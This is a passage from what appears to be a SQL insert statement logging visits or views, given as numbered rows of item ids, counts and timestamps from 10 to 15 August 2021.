08:32:05'),(30350,1734,1,'2021-08-10','2021-08-10 08:39:22'),(30351,1602,1,'2021-08-10','2021-08-10 08:53:43'),(30352,1602,1,'2021-08-10','2021-08-10 09:29:07'),(30353,1602,1,'2021-08-10','2021-08-10 09:33:24'),(30354,2309,1,'2021-08-10','2021-08-10 09:39:42'),(30355,1596,1,'2021-08-10','2021-08-10 09:39:46'),(30356,1588,1,'2021-08-10','2021-08-10 10:08:20'),(30357,80,1,'2021-08-10','2021-08-10 10:22:01'),(30358,3781,1,'2021-08-10','2021-08-10 10:34:12'),(30359,1598,1,'2021-08-10','2021-08-10 10:39:13'),(30360,1610,1,'2021-08-10','2021-08-10 11:10:19'),(30361,1582,1,'2021-08-10','2021-08-10 11:13:26'),(30362,3781,1,'2021-08-10','2021-08-10 11:23:13'),(30363,1602,1,'2021-08-10','2021-08-10 11:40:01'),(30364,1780,1,'2021-08-10','2021-08-10 11:44:22'),(30365,1598,1,'2021-08-10','2021-08-10 11:46:27'),(30366,1598,1,'2021-08-10','2021-08-10 11:55:51'),(30367,1582,1,'2021-08-10','2021-08-10 12:08:31'),(30368,2769,1,'2021-08-10','2021-08-10 12:10:48'),(30369,2457,1,'2021-08-10','2021-08-10 12:17:16'),(30370,3124,1,'2021-08-10','2021-08-10 12:27:18'),(30371,3117,1,'2021-08-10','2021-08-10 12:29:37'),(30372,3127,1,'2021-08-10','2021-08-10 12:32:00'),(30373,3287,1,'2021-08-10','2021-08-10 12:35:44'),(30374,1610,1,'2021-08-10','2021-08-10 12:52:18'),(30375,80,1,'2021-08-10','2021-08-10 12:53:06'),(30376,3307,1,'2021-08-10','2021-08-10 13:00:44'),(30377,3781,1,'2021-08-10','2021-08-10 13:25:02'),(30378,1610,1,'2021-08-10','2021-08-10 13:28:16'),(30379,3030,1,'2021-08-10','2021-08-10 13:30:55'),(30380,3034,1,'2021-08-10','2021-08-10 13:31:21'),(30381,3117,1,'2021-08-10','2021-08-10 13:36:39'),(30382,3127,1,'2021-08-10','2021-08-10 13:36:39'),(30383,2813,1,'2021-08-10','2021-08-10 13:41:03'),(30384,3781,1,'2021-08-10','2021-08-10 13:42:29'),(30385,1606,1,'2021-08-10','2021-08-10 14:01:05'),(30386,473,1,'2021-08-10','2021-08-10 14:01:07'),(30387,84,1,'2021-08-10','2021-08-10 15:40:09'),(30388,1877,1,'2021-08-10','2021-08-10 15:45:01'),(30389,1870,1,'2021-08-10','2021-08-10 15:45:18'),(30390,1872,1,'2021-08-10','2021-08-10 15:45:42'),(30391,1877,1,'2021-08-10','2021-08-10 15:46:18'),(30392,1602,1,'2021-08-10','2021-08-10 15:50:18'),(30393,3127,1,'2021-08-10','2021-08-10 15:53:13'),(30394,1872,1,'2021-08-10','2021-08-10 15:54:33'),(30395,1588,1,'2021-08-10','2021-08-10 16:12:31'),(30396,68,1,'2021-08-10','2021-08-10 16:14:27'),(30397,2309,1,'2021-08-10','2021-08-10 16:22:13'),(30398,3764,1,'2021-08-10','2021-08-10 16:32:20'),(30399,2457,1,'2021-08-10','2021-08-10 16:48:43'),(30400,1602,1,'2021-08-10','2021-08-10 17:01:38'),(30401,91,1,'2021-08-10','2021-08-10 17:02:14'),(30402,1602,1,'2021-08-10','2021-08-10 17:02:23'),(30403,3479,1,'2021-08-10','2021-08-10 17:18:22'),(30404,1602,1,'2021-08-10','2021-08-10 17:25:02'),(30405,3705,1,'2021-08-10','2021-08-10 17:33:10'),(30406,1741,1,'2021-08-10','2021-08-10 17:48:23'),(30407,1544,1,'2021-08-10','2021-08-10 18:12:50'),(30408,1741,1,'2021-08-10','2021-08-10 18:31:20'),(30409,2309,1,'2021-08-10','2021-08-10 18:43:04'),(30410,1588,1,'2021-08-10','2021-08-10 19:13:25'),(30411,1598,1,'2021-08-10','2021-08-10 19:23:27'),(30412,3781,1,'2021-08-10','2021-08-10 19:24:13'),(30413,1602,1,'2021-08-10','2021-08-10 19:35:16'),(30414,3253,1,'2021-08-10','2021-08-10 20:13:39'),(30415,76,1,'2021-08-10','2021-08-10 20:19:11'),(30416,3781,1,'2021-08-10','2021-08-10 20:29:22'),(30417,2704,1,'2021-08-10','2021-08-10 20:49:24'),(30418,2989,1,'2021-08-10','2021-08-10 21:07:49'),(30419,1600,1,'2021-08-10','2021-08-10 21:42:46'),(30420,3030,1,'2021-08-10','2021-08-10 22:24:36'),(30421,2813,1,'2021-08-10','2021-08-10 22:55:07'),(30422,1582,1,'2021-08-10','2021-08-10 23:35:42'),(30423,335,1,'2021-08-10','2021-08-10 23:44:42'),(30424,335,1,'2021-08-10','2021-08-10 23:44:54'),(30425,335,1,'2021-08-10','2021-08-10 23:45:02'),(30426,335,1,'2021-08-10','2021-08-10 23:45:06'),(30427,335,1,'2021-08-10','2021-08-10 23:45:29'),(30428,335,1,'2021-08-11','2021-08-11 00:02:03'),(30429,335,1,'2021-08-11','2021-08-11 00:02:12'),(30430,89,1,'2021-08-11','2021-08-11 00:02:47'),(30431,335,1,'2021-08-11','2021-08-11 00:06:24'),(30432,1586,1,'2021-08-11','2021-08-11 00:30:57'),(30433,3030,1,'2021-08-11','2021-08-11 00:36:08'),(30434,1602,1,'2021-08-11','2021-08-11 01:07:24'),(30435,3781,1,'2021-08-11','2021-08-11 01:26:43'),(30436,2410,1,'2021-08-11','2021-08-11 01:39:11'),(30437,1870,1,'2021-08-11','2021-08-11 01:46:00'),(30438,2309,1,'2021-08-11','2021-08-11 01:56:21'),(30439,1594,1,'2021-08-11','2021-08-11 02:28:53'),(30440,1596,1,'2021-08-11','2021-08-11 02:36:14'),(30441,3705,1,'2021-08-11','2021-08-11 02:56:06'),(30442,3069,1,'2021-08-11','2021-08-11 03:16:05'),(30443,2309,1,'2021-08-11','2021-08-11 03:26:09'),(30444,1600,1,'2021-08-11','2021-08-11 03:29:15'),(30445,1718,1,'2021-08-11','2021-08-11 03:36:20'),(30446,3307,1,'2021-08-11','2021-08-11 04:06:33'),(30447,2457,1,'2021-08-11','2021-08-11 04:25:27'),(30448,1588,1,'2021-08-11','2021-08-11 05:16:56'),(30449,3058,1,'2021-08-11','2021-08-11 05:56:54'),(30450,1598,1,'2021-08-11','2021-08-11 06:17:13'),(30451,1600,1,'2021-08-11','2021-08-11 06:25:25'),(30452,80,1,'2021-08-11','2021-08-11 06:36:05'),(30453,2395,1,'2021-08-11','2021-08-11 06:36:39'),(30454,2503,1,'2021-08-11','2021-08-11 06:38:20'),(30455,2769,1,'2021-08-11','2021-08-11 06:47:25'),(30456,1780,1,'2021-08-11','2021-08-11 07:25:30'),(30457,84,1,'2021-08-11','2021-08-11 07:37:00'),(30458,89,1,'2021-08-11','2021-08-11 07:44:44'),(30459,3307,1,'2021-08-11','2021-08-11 07:47:36'),(30460,91,1,'2021-08-11','2021-08-11 07:56:14'),(30461,87,1,'2021-08-11','2021-08-11 07:58:38'),(30462,72,1,'2021-08-11','2021-08-11 08:00:52'),(30463,2813,1,'2021-08-11','2021-08-11 08:07:46'),(30464,1718,1,'2021-08-11','2021-08-11 08:17:55'),(30465,1780,1,'2021-08-11','2021-08-11 08:25:25'),(30466,68,1,'2021-08-11','2021-08-11 08:35:56'),(30467,1600,1,'2021-08-11','2021-08-11 08:47:32'),(30468,1728,1,'2021-08-11','2021-08-11 09:04:49'),(30469,3781,1,'2021-08-11','2021-08-11 09:13:09'),(30470,3030,1,'2021-08-11','2021-08-11 09:19:16'),(30471,89,1,'2021-08-11','2021-08-11 09:22:16'),(30472,1598,1,'2021-08-11','2021-08-11 09:26:05'),(30473,89,1,'2021-08-11','2021-08-11 09:28:15'),(30474,1588,1,'2021-08-11','2021-08-11 09:28:26'),(30475,1602,1,'2021-08-11','2021-08-11 09:35:40'),(30476,1602,1,'2021-08-11','2021-08-11 09:37:29'),(30477,1598,1,'2021-08-11','2021-08-11 09:49:25'),(30478,1598,1,'2021-08-11','2021-08-11 09:57:29'),(30479,3479,1,'2021-08-11','2021-08-11 10:25:24'),(30480,1602,1,'2021-08-11','2021-08-11 11:00:14'),(30481,1602,1,'2021-08-11','2021-08-11 11:00:19'),(30482,1596,1,'2021-08-11','2021-08-11 11:07:00'),(30483,1596,1,'2021-08-11','2021-08-11 11:07:15'),(30484,91,1,'2021-08-11','2021-08-11 11:08:22'),(30485,3102,1,'2021-08-11','2021-08-11 11:08:32'),(30486,91,1,'2021-08-11','2021-08-11 11:22:41'),(30487,3261,1,'2021-08-11','2021-08-11 11:22:47'),(30488,1594,1,'2021-08-11','2021-08-11 11:25:26'),(30489,3287,1,'2021-08-11','2021-08-11 11:27:16'),(30490,3541,1,'2021-08-11','2021-08-11 11:27:25'),(30491,3285,1,'2021-08-11','2021-08-11 11:27:34'),(30492,3282,1,'2021-08-11','2021-08-11 11:27:42'),(30493,3280,1,'2021-08-11','2021-08-11 11:27:51'),(30494,3278,1,'2021-08-11','2021-08-11 11:27:59'),(30495,3245,1,'2021-08-11','2021-08-11 11:28:11'),(30496,3243,1,'2021-08-11','2021-08-11 11:28:29'),(30497,3249,1,'2021-08-11','2021-08-11 11:28:42'),(30498,3261,1,'2021-08-11','2021-08-11 11:28:50'),(30499,3269,1,'2021-08-11','2021-08-11 11:28:56'),(30500,3271,1,'2021-08-11','2021-08-11 11:29:23'),(30501,3273,1,'2021-08-11','2021-08-11 11:29:30'),(30502,3275,1,'2021-08-11','2021-08-11 11:29:35'),(30503,1598,1,'2021-08-11','2021-08-11 11:45:52'),(30504,1608,1,'2021-08-11','2021-08-11 11:55:58'),(30505,1608,1,'2021-08-11','2021-08-11 12:02:57'),(30506,3781,1,'2021-08-11','2021-08-11 12:08:36'),(30507,3030,1,'2021-08-11','2021-08-11 12:19:46'),(30508,1596,1,'2021-08-11','2021-08-11 12:45:52'),(30509,1596,1,'2021-08-11','2021-08-11 12:46:44'),(30510,76,1,'2021-08-11','2021-08-11 12:47:17'),(30511,76,1,'2021-08-11','2021-08-11 12:49:19'),(30512,1596,1,'2021-08-11','2021-08-11 12:49:22'),(30513,2309,1,'2021-08-11','2021-08-11 13:00:37'),(30514,2490,1,'2021-08-11','2021-08-11 13:08:33'),(30515,3705,1,'2021-08-11','2021-08-11 13:10:45'),(30516,2704,1,'2021-08-11','2021-08-11 13:54:58'),(30517,2309,1,'2021-08-11','2021-08-11 14:10:34'),(30518,1606,1,'2021-08-11','2021-08-11 14:12:05'),(30519,91,1,'2021-08-11','2021-08-11 14:12:56'),(30520,1606,1,'2021-08-11','2021-08-11 14:13:56'),(30521,76,1,'2021-08-11','2021-08-11 14:14:02'),(30522,76,1,'2021-08-11','2021-08-11 14:14:16'),(30523,2503,1,'2021-08-11','2021-08-11 14:14:53'),(30524,3691,1,'2021-08-11','2021-08-11 14:31:05'),(30525,3058,1,'2021-08-11','2021-08-11 14:41:15'),(30526,1598,1,'2021-08-11','2021-08-11 14:51:25'),(30527,1582,1,'2021-08-11','2021-08-11 14:54:55'),(30528,1588,1,'2021-08-11','2021-08-11 15:01:43'),(30529,1610,1,'2021-08-11','2021-08-11 15:02:26'),(30530,1610,1,'2021-08-11','2021-08-11 15:03:46'),(30531,1718,1,'2021-08-11','2021-08-11 15:11:34'),(30532,1600,1,'2021-08-11','2021-08-11 15:25:25'),(30533,1600,1,'2021-08-11','2021-08-11 15:40:11'),(30534,3721,1,'2021-08-11','2021-08-11 15:49:05'),(30535,3721,1,'2021-08-11','2021-08-11 15:49:09'),(30536,2769,1,'2021-08-11','2021-08-11 15:53:48'),(30537,2159,1,'2021-08-11','2021-08-11 16:07:33'),(30538,1606,1,'2021-08-11','2021-08-11 16:11:46'),(30539,1870,1,'2021-08-11','2021-08-11 16:11:48'),(30540,3069,1,'2021-08-11','2021-08-11 16:22:26'),(30541,2159,1,'2021-08-11','2021-08-11 16:24:21'),(30542,1582,1,'2021-08-11','2021-08-11 16:25:22'),(30543,84,1,'2021-08-11','2021-08-11 17:12:56'),(30544,2503,1,'2021-08-11','2021-08-11 17:13:14'),(30545,3253,1,'2021-08-11','2021-08-11 17:22:19'),(30546,3307,1,'2021-08-11','2021-08-11 17:31:51'),(30547,1588,1,'2021-08-11','2021-08-11 17:39:40'),(30548,2159,1,'2021-08-11','2021-08-11 17:43:19'),(30549,87,1,'2021-08-11','2021-08-11 17:45:07'),(30550,1588,1,'2021-08-11','2021-08-11 17:45:18'),(30551,76,1,'2021-08-11','2021-08-11 17:45:26'),(30552,3271,1,'2021-08-11','2021-08-11 17:45:53'),(30553,1588,1,'2021-08-11','2021-08-11 17:46:03'),(30554,3030,1,'2021-08-11','2021-08-11 18:01:32'),(30555,2813,1,'2021-08-11','2021-08-11 18:31:48'),(30556,3083,1,'2021-08-11','2021-08-11 19:21:46'),(30557,1602,1,'2021-08-11','2021-08-11 19:26:08'),(30558,1544,1,'2021-08-11','2021-08-11 19:42:08'),(30559,80,1,'2021-08-11','2021-08-11 20:38:26'),(30560,80,1,'2021-08-11','2021-08-11 20:40:23'),(30561,2769,1,'2021-08-11','2021-08-11 20:53:13'),(30562,1592,1,'2021-08-11','2021-08-11 21:57:27'),(30563,1592,1,'2021-08-11','2021-08-11 22:01:20'),(30564,1592,1,'2021-08-11','2021-08-11 22:01:39'),(30565,3541,1,'2021-08-11','2021-08-11 22:02:31'),(30566,1592,1,'2021-08-11','2021-08-11 22:03:49'),(30567,3030,1,'2021-08-11','2021-08-11 23:14:35'),(30568,1602,1,'2021-08-11','2021-08-11 23:25:08'),(30569,1598,1,'2021-08-11','2021-08-11 23:26:32'),(30570,1602,1,'2021-08-11','2021-08-11 23:27:22'),(30571,1608,1,'2021-08-11','2021-08-11 23:27:26'),(30572,2309,1,'2021-08-11','2021-08-11 23:34:45'),(30573,1598,1,'2021-08-11','2021-08-11 23:44:32'),(30574,1598,1,'2021-08-12','2021-08-12 00:14:35'),(30575,1588,1,'2021-08-12','2021-08-12 00:34:42'),(30576,1582,1,'2021-08-12','2021-08-12 01:12:00'),(30577,1606,1,'2021-08-12','2021-08-12 01:14:47'),(30578,3271,1,'2021-08-12','2021-08-12 01:23:00'),(30579,2904,1,'2021-08-12','2021-08-12 01:38:03'),(30580,469,1,'2021-08-12','2021-08-12 01:41:17'),(30581,1582,1,'2021-08-12','2021-08-12 01:53:06'),(30582,2704,1,'2021-08-12','2021-08-12 02:08:02'),(30583,3104,1,'2021-08-12','2021-08-12 02:23:04'),(30584,2775,1,'2021-08-12','2021-08-12 02:38:00'),(30585,3069,1,'2021-08-12','2021-08-12 02:45:52'),(30586,1602,1,'2021-08-12','2021-08-12 02:53:02'),(30587,91,1,'2021-08-12','2021-08-12 03:27:50'),(30588,1606,1,'2021-08-12','2021-08-12 04:05:19'),(30589,1600,1,'2021-08-12','2021-08-12 04:23:01'),(30590,1600,1,'2021-08-12','2021-08-12 04:42:35'),(30591,87,1,'2021-08-12','2021-08-12 05:17:27'),(30592,1741,1,'2021-08-12','2021-08-12 05:23:02'),(30593,1606,1,'2021-08-12','2021-08-12 05:28:57'),(30594,3030,1,'2021-08-12','2021-08-12 06:16:05'),(30595,1594,1,'2021-08-12','2021-08-12 06:17:28'),(30596,1586,1,'2021-08-12','2021-08-12 06:44:40'),(30597,472,1,'2021-08-12','2021-08-12 07:11:51'),(30598,1544,1,'2021-08-12','2021-08-12 08:46:53'),(30599,1718,1,'2021-08-12','2021-08-12 09:17:45'),(30600,3271,1,'2021-08-12','2021-08-12 09:41:23'),(30601,2503,1,'2021-08-12','2021-08-12 10:00:51'),(30602,3482,1,'2021-08-12','2021-08-12 10:07:30'),(30603,3060,1,'2021-08-12','2021-08-12 10:37:52'),(30604,108,1,'2021-08-12','2021-08-12 11:07:54'),(30605,1598,1,'2021-08-12','2021-08-12 11:31:57'),(30606,91,1,'2021-08-12','2021-08-12 11:43:19'),(30607,91,1,'2021-08-12','2021-08-12 11:44:04'),(30608,89,1,'2021-08-12','2021-08-12 11:54:18'),(30609,87,1,'2021-08-12','2021-08-12 11:55:29'),(30610,1582,1,'2021-08-12','2021-08-12 12:15:03'),(30611,1728,1,'2021-08-12','2021-08-12 12:19:14'),(30612,1737,1,'2021-08-12','2021-08-12 12:19:31'),(30613,1602,1,'2021-08-12','2021-08-12 12:47:34'),(30614,1596,1,'2021-08-12','2021-08-12 13:05:21'),(30615,1598,1,'2021-08-12','2021-08-12 13:08:33'),(30616,1602,1,'2021-08-12','2021-08-12 13:16:44'),(30617,1602,1,'2021-08-12','2021-08-12 13:16:45'),(30618,1602,1,'2021-08-12','2021-08-12 13:16:47'),(30619,1602,1,'2021-08-12','2021-08-12 13:19:05'),(30620,1596,1,'2021-08-12','2021-08-12 13:22:07'),(30621,3030,1,'2021-08-12','2021-08-12 13:28:48'),(30622,91,1,'2021-08-12','2021-08-12 13:38:25'),(30623,80,1,'2021-08-12','2021-08-12 14:26:55'),(30624,3271,1,'2021-08-12','2021-08-12 14:37:40'),(30625,1602,1,'2021-08-12','2021-08-12 14:56:52'),(30626,1594,1,'2021-08-12','2021-08-12 15:01:38'),(30627,2457,1,'2021-08-12','2021-08-12 15:07:25'),(30628,1728,1,'2021-08-12','2021-08-12 15:07:52'),(30629,80,1,'2021-08-12','2021-08-12 15:16:40'),(30630,80,1,'2021-08-12','2021-08-12 15:18:28'),(30631,1602,1,'2021-08-12','2021-08-12 15:26:26'),(30632,1582,1,'2021-08-12','2021-08-12 15:44:38'),(30633,91,1,'2021-08-12','2021-08-12 16:00:24'),(30634,91,1,'2021-08-12','2021-08-12 16:03:42'),(30635,2410,1,'2021-08-12','2021-08-12 17:00:12'),(30636,1586,1,'2021-08-12','2021-08-12 18:49:40'),(30637,1596,1,'2021-08-12','2021-08-12 19:36:24'),(30638,1596,1,'2021-08-12','2021-08-12 19:41:02'),(30639,91,1,'2021-08-12','2021-08-12 19:46:20'),(30640,3287,1,'2021-08-12','2021-08-12 20:24:15'),(30641,3285,1,'2021-08-12','2021-08-12 20:27:34'),(30642,2904,1,'2021-08-12','2021-08-12 20:32:44'),(30643,1606,1,'2021-08-12','2021-08-12 20:42:56'),(30644,1602,1,'2021-08-12','2021-08-12 20:55:29'),(30645,1582,1,'2021-08-12','2021-08-12 20:59:17'),(30646,3694,1,'2021-08-12','2021-08-12 21:36:01'),(30647,3694,1,'2021-08-12','2021-08-12 21:36:29'),(30648,1586,1,'2021-08-12','2021-08-12 22:13:45'),(30649,1602,1,'2021-08-12','2021-08-12 22:20:39'),(30650,1606,1,'2021-08-12','2021-08-12 22:42:29'),(30651,487,1,'2021-08-12','2021-08-12 22:42:31'),(30652,2457,1,'2021-08-12','2021-08-12 23:01:43'),(30653,1608,1,'2021-08-12','2021-08-12 23:18:46'),(30654,3030,1,'2021-08-13','2021-08-13 01:30:16'),(30655,1598,1,'2021-08-13','2021-08-13 01:59:56'),(30656,3482,1,'2021-08-13','2021-08-13 03:28:33'),(30657,1602,1,'2021-08-13','2021-08-13 03:28:47'),(30658,91,1,'2021-08-13','2021-08-13 04:36:54'),(30659,1594,1,'2021-08-13','2021-08-13 05:10:59'),(30660,2297,1,'2021-08-13','2021-08-13 05:35:50'),(30661,487,1,'2021-08-13','2021-08-13 05:49:10'),(30662,80,1,'2021-08-13','2021-08-13 06:00:08'),(30663,1586,1,'2021-08-13','2021-08-13 06:16:12'),(30664,3541,1,'2021-08-13','2021-08-13 06:19:27'),(30665,1594,1,'2021-08-13','2021-08-13 06:52:52'),(30666,1612,1,'2021-08-13','2021-08-13 07:03:32'),(30667,1594,1,'2021-08-13','2021-08-13 07:08:32'),(30668,87,1,'2021-08-13','2021-08-13 07:10:41'),(30669,1594,1,'2021-08-13','2021-08-13 07:11:01'),(30670,1586,1,'2021-08-13','2021-08-13 08:08:21'),(30671,80,1,'2021-08-13','2021-08-13 08:13:23'),(30672,68,1,'2021-08-13','2021-08-13 08:21:11'),(30673,3781,1,'2021-08-13','2021-08-13 08:28:39'),(30674,1592,1,'2021-08-13','2021-08-13 08:31:24'),(30675,89,1,'2021-08-13','2021-08-13 08:49:15'),(30676,1582,1,'2021-08-13','2021-08-13 08:52:20'),(30677,1592,1,'2021-08-13','2021-08-13 08:55:12'),(30678,84,1,'2021-08-13','2021-08-13 08:58:48'),(30679,3694,1,'2021-08-13','2021-08-13 08:59:03'),(30680,84,1,'2021-08-13','2021-08-13 09:01:18'),(30681,3664,1,'2021-08-13','2021-08-13 09:01:23'),(30682,84,1,'2021-08-13','2021-08-13 09:02:26'),(30683,3691,1,'2021-08-13','2021-08-13 09:02:31'),(30684,84,1,'2021-08-13','2021-08-13 09:03:46'),(30685,1877,1,'2021-08-13','2021-08-13 09:04:31'),(30686,84,1,'2021-08-13','2021-08-13 09:05:57'),(30687,68,1,'2021-08-13','2021-08-13 09:09:26'),(30688,3004,1,'2021-08-13','2021-08-13 09:22:37'),(30689,472,1,'2021-08-13','2021-08-13 10:08:12'),(30690,480,1,'2021-08-13','2021-08-13 10:16:37'),(30691,3271,1,'2021-08-13','2021-08-13 10:19:14'),(30692,1778,1,'2021-08-13','2021-08-13 10:41:11'),(30693,1602,1,'2021-08-13','2021-08-13 10:42:16'),(30694,68,1,'2021-08-13','2021-08-13 11:02:00'),(30695,1724,1,'2021-08-13','2021-08-13 11:05:12'),(30696,3781,1,'2021-08-13','2021-08-13 11:14:28'),(30697,2609,1,'2021-08-13','2021-08-13 11:15:07'),(30698,3083,1,'2021-08-13','2021-08-13 11:15:14'),(30699,2704,1,'2021-08-13','2021-08-13 11:31:38'),(30700,3083,1,'2021-08-13','2021-08-13 11:31:40'),(30701,1602,1,'2021-08-13','2021-08-13 11:36:22'),(30702,2704,1,'2021-08-13','2021-08-13 11:36:55'),(30703,2704,1,'2021-08-13','2021-08-13 11:39:27'),(30704,3083,1,'2021-08-13','2021-08-13 11:54:51'),(30705,87,1,'2021-08-13','2021-08-13 12:09:36'),(30706,87,1,'2021-08-13','2021-08-13 12:09:59'),(30707,2956,1,'2021-08-13','2021-08-13 12:10:42'),(30708,87,1,'2021-08-13','2021-08-13 12:12:55'),(30709,87,1,'2021-08-13','2021-08-13 12:13:39'),(30710,2617,1,'2021-08-13','2021-08-13 12:13:59'),(30711,1598,1,'2021-08-13','2021-08-13 12:15:25'),(30712,2704,1,'2021-08-13','2021-08-13 12:15:37'),(30713,1602,1,'2021-08-13','2021-08-13 12:18:48'),(30714,1602,1,'2021-08-13','2021-08-13 12:19:05'),(30715,3271,1,'2021-08-13','2021-08-13 12:58:23'),(30716,1776,1,'2021-08-13','2021-08-13 13:07:34'),(30717,1600,1,'2021-08-13','2021-08-13 13:43:36'),(30718,1724,1,'2021-08-13','2021-08-13 13:46:45'),(30719,1602,1,'2021-08-13','2021-08-13 13:48:42'),(30720,1602,1,'2021-08-13','2021-08-13 13:52:38'),(30721,1602,1,'2021-08-13','2021-08-13 13:52:50'),(30722,1600,1,'2021-08-13','2021-08-13 13:59:26'),(30723,91,1,'2021-08-13','2021-08-13 13:59:48'),(30724,1600,1,'2021-08-13','2021-08-13 14:00:54'),(30725,1720,1,'2021-08-13','2021-08-13 14:11:16'),(30726,1586,1,'2021-08-13','2021-08-13 14:33:03'),(30727,2956,1,'2021-08-13','2021-08-13 16:01:32'),(30728,2395,1,'2021-08-13','2021-08-13 17:19:38'),(30729,1594,1,'2021-08-13','2021-08-13 17:41:26'),(30730,2395,1,'2021-08-13','2021-08-13 18:19:51'),(30731,3038,1,'2021-08-13','2021-08-13 18:27:03'),(30732,3079,1,'2021-08-13','2021-08-13 19:04:36'),(30733,1592,1,'2021-08-13','2021-08-13 19:36:07'),(30734,3282,1,'2021-08-13','2021-08-13 20:09:25'),(30735,2309,1,'2021-08-13','2021-08-13 21:06:46'),(30736,2503,1,'2021-08-13','2021-08-13 21:07:47'),(30737,2178,1,'2021-08-13','2021-08-13 21:47:29'),(30738,76,1,'2021-08-13','2021-08-13 22:40:01'),(30739,2309,1,'2021-08-13','2021-08-13 22:57:51'),(30740,1602,1,'2021-08-13','2021-08-13 23:07:09'),(30741,1602,1,'2021-08-13','2021-08-13 23:15:41'),(30742,1602,1,'2021-08-13','2021-08-13 23:18:01'),(30743,76,1,'2021-08-13','2021-08-13 23:49:46'),(30744,1614,1,'2021-08-13','2021-08-13 23:59:22'),(30745,80,1,'2021-08-14','2021-08-14 00:39:27'),(30746,1598,1,'2021-08-14','2021-08-14 00:57:50'),(30747,2989,1,'2021-08-14','2021-08-14 00:59:25'),(30748,3307,1,'2021-08-14','2021-08-14 01:39:18'),(30749,487,1,'2021-08-14','2021-08-14 01:49:28'),(30750,1588,1,'2021-08-14','2021-08-14 01:51:23'),(30751,1602,1,'2021-08-14','2021-08-14 01:59:20'),(30752,1614,1,'2021-08-14','2021-08-14 02:19:20'),(30753,468,1,'2021-08-14','2021-08-14 02:39:37'),(30754,3066,1,'2021-08-14','2021-08-14 03:50:22'),(30755,1774,1,'2021-08-14','2021-08-14 03:58:30'),(30756,2769,1,'2021-08-14','2021-08-14 04:19:25'),(30757,3482,1,'2021-08-14','2021-08-14 06:19:34'),(30758,2503,1,'2021-08-14','2021-08-14 07:09:35'),(30759,2503,1,'2021-08-14','2021-08-14 07:19:26'),(30760,1592,1,'2021-08-14','2021-08-14 07:40:02'),(30761,3486,1,'2021-08-14','2021-08-14 08:03:03'),(30762,1877,1,'2021-08-14','2021-08-14 08:37:33'),(30763,1582,1,'2021-08-14','2021-08-14 08:49:03'),(30764,3079,1,'2021-08-14','2021-08-14 09:00:33'),(30765,3764,1,'2021-08-14','2021-08-14 09:16:11'),(30766,3781,1,'2021-08-14','2021-08-14 09:17:27'),(30767,3764,1,'2021-08-14','2021-08-14 09:18:50'),(30768,474,1,'2021-08-14','2021-08-14 09:23:33'),(30769,3781,1,'2021-08-14','2021-08-14 09:24:27'),(30770,1602,1,'2021-08-14','2021-08-14 09:35:09'),(30771,1592,1,'2021-08-14','2021-08-14 09:48:51'),(30772,2309,1,'2021-08-14','2021-08-14 11:10:26'),(30773,1594,1,'2021-08-14','2021-08-14 11:19:56'),(30774,1610,1,'2021-08-14','2021-08-14 12:38:28'),(30775,3251,1,'2021-08-14','2021-08-14 12:40:34'),(30776,1586,1,'2021-08-14','2021-08-14 12:44:29'),(30777,2934,1,'2021-08-14','2021-08-14 13:14:41'),(30778,3764,1,'2021-08-14','2021-08-14 13:22:56'),(30779,570,1,'2021-08-14','2021-08-14 16:17:30'),(30780,80,1,'2021-08-14','2021-08-14 16:17:48'),(30781,3710,1,'2021-08-14','2021-08-14 16:35:48'),(30782,2309,1,'2021-08-14','2021-08-14 16:42:48'),(30783,2813,1,'2021-08-14','2021-08-14 17:13:19'),(30784,1598,1,'2021-08-14','2021-08-14 17:34:37'),(30785,1614,1,'2021-08-14','2021-08-14 17:50:44'),(30786,1600,1,'2021-08-14','2021-08-14 18:48:13'),(30787,76,1,'2021-08-14','2021-08-14 19:22:41'),(30788,1582,1,'2021-08-14','2021-08-14 19:48:36'),(30789,89,1,'2021-08-14','2021-08-14 20:16:13'),(30790,2956,1,'2021-08-14','2021-08-14 20:40:31'),(30791,2457,1,'2021-08-14','2021-08-14 21:20:23'),(30792,3060,1,'2021-08-14','2021-08-14 21:28:54'),(30793,3486,1,'2021-08-14','2021-08-14 21:39:18'),(30794,474,1,'2021-08-14','2021-08-14 21:41:45'),(30795,1600,1,'2021-08-14','2021-08-14 21:41:59'),(30796,3038,1,'2021-08-14','2021-08-14 21:54:23'),(30797,472,1,'2021-08-14','2021-08-14 22:01:27'),(30798,3023,1,'2021-08-14','2021-08-14 22:10:27'),(30799,1592,1,'2021-08-14','2021-08-14 22:23:25'),(30800,80,1,'2021-08-14','2021-08-14 22:23:34'),(30801,2309,1,'2021-08-14','2021-08-14 22:45:59'),(30802,1606,1,'2021-08-14','2021-08-14 22:47:45'),(30803,1602,1,'2021-08-14','2021-08-14 23:21:52'),(30804,1877,1,'2021-08-14','2021-08-14 23:31:28'),(30805,1602,1,'2021-08-14','2021-08-14 23:38:53'),(30806,1592,1,'2021-08-15','2021-08-15 00:42:24'),(30807,3038,1,'2021-08-15','2021-08-15 00:54:31'),(30808,3307,1,'2021-08-15','2021-08-15 01:24:48'),(30809,1720,1,'2021-08-15','2021-08-15 01:25:42'),(30810,1582,1,'2021-08-15','2021-08-15 01:33:39'),(30811,2956,1,'2021-08-15','2021-08-15 01:50:57'),(30812,2309,1,'2021-08-15','2021-08-15 02:05:11'),(30813,1592,1,'2021-08-15','2021-08-15 02:18:17'),(30814,2309,1,'2021-08-15','2021-08-15 03:06:16'),(30815,1610,1,'2021-08-15','2021-08-15 03:30:06'),(30816,1614,1,'2021-08-15','2021-08-15 04:31:14'),(30817,1600,1,'2021-08-15','2021-08-15 05:07:23'),(30818,1608,1,'2021-08-15','2021-08-15 05:15:33'),(30819,89,1,'2021-08-15','2021-08-15 05:17:50'),(30820,2956,1,'2021-08-15','2021-08-15 05:47:51'),(30821,1586,1,'2021-08-15','2021-08-15 06:37:25'),(30822,335,1,'2021-08-15','2021-08-15 07:22:56'),(30823,1720,1,'2021-08-15','2021-08-15 07:57:58'),(30824,1606,1,'2021-08-15','2021-08-15 08:13:59'),(30825,3307,1,'2021-08-15','2021-08-15 08:28:21'),(30826,3482,1,'2021-08-15','2021-08-15 09:29:12'),(30827,1588,1,'2021-08-15','2021-08-15 09:59:15'),(30828,1598,1,'2021-08-15','2021-08-15 10:23:50'),(30829,80,1,'2021-08-15','2021-08-15 11:25:23'),(30830,2309,1,'2021-08-15','2021-08-15 11:50:04'),(30831,2309,1,'2021-08-15','2021-08-15 12:58:41'),(30832,1604,1,'2021-08-15','2021-08-15 13:18:05'),(30833,89,1,'2021-08-15','2021-08-15 13:24:22'),(30834,2956,1,'2021-08-15','2021-08-15 13:30:42'),(30835,1604,1,'2021-08-15','2021-08-15 